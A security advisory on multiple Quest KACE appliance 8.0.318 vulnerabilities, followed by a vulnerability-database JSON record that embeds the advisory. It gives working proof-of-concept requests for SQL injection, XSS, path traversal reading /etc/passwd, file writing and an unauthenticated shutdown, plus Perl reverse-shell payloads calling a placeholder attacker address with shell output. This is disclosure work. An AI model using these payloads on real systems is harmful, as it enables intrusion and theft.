[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files, respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be written to any location where the 'www' user has write permissions.
File deletion could be abused to delete the '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence determines whether the appliance setup wizard is shown.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Using the issues described in 7.2 and 7.4, we were able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core for its reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM stated that the work done by Core was in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action.
2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered the email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involve publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together.
With regards to Quest's requests, Core provided the researchers' names and the URL at which the advisory would be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked for the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made patches available for their customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0594",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11134"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11134",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-11134",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-11281",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11134",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11134",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11281",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1220",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-11134",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11281"
},
{
"db": "VULMON",
"id": "CVE-2018-11134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005457"
},
{
"db": "NVD",
"id": "CVE-2018-11134"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1220"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "In order to perform actions that require higher privileges, the Quest KACE System Management Appliance 8.0.318 relies on a message queue manager that runs with root privileges and only allows a set of commands. One of the available commands allows changing any user\u0027s password (including root). A low-privilege user could abuse this feature by changing the password of the \u0027kace_support\u0027 account, which comes disabled by default but has full sudo privileges. Quest KACE System Management Appliance contains a vulnerability related to the password management function. Information may be obtained or altered, and service operation may be disrupted (DoS). Quest KACE System Management Appliance is an IT asset management device from Quest Software, USA. A security vulnerability exists in the Quest KACE System Management Appliance 8.0.318 release. An attacker could use this vulnerability to change the \u2018kace_support\u2019 account password. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. 
*Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. 
\n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. 
*Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. 
version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse 
shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. 
\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. \n\n7.5. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. 
\n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. 
